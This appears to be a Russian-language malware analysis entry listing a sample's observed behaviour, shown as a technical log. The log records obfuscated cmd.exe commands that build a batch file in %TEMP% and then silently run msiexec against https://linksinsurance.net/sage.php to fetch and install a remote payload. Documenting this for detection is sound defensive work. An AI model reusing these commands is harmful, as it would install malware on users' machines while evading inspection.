Техническая информация
- '<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%© summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^
- %TEMP%\summary.csv
- %TEMP%\update1.bat
- %TEMP%\update.bat
- 'li####nsurance.net':443
- DNS ASK li####nsurance.net
- '<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%© summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^' (со скрытым окном)
- '<SYSTEM32>\ping.exe' 1 -n 5
- '<SYSTEM32>\cmd.exe' /C echo
- '<SYSTEM32>\cmd.exe' /S /D /c" set/p="msie" 1>%TEMP%\update.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set/P="^xec%1" 1>>%TEMP%\update.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set/P="ht^tps^:^/^/linksinsurance.net/sage.php" 1>>%TEMP%\update.bat"
- '<SYSTEM32>\msiexec.exe' /q/ihttps://linksinsurance.net/sage.php